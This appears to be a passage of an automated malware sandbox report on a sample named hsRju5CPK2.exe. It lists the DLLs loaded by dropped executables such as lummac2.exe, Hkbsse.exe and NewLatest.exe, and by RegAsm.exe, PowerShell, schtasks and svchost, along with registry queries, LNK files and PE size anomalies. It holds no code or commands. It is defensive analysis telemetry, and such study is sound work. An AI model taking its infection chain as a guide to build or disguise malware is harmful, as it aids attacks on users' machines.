Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Section loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Section loaded: advpack.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Slides.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.20.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: hsRju5CPK2.exe

Static file information: File size 1907712 > 1048576

Source: hsRju5CPK2.exe

Static PE information: Raw size of vlmgqsmh is bigger than: 0x100000 < 0x1a0400

Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4500436480.0000000005314000.00000004.00000020.00020000.00000000.sdmp
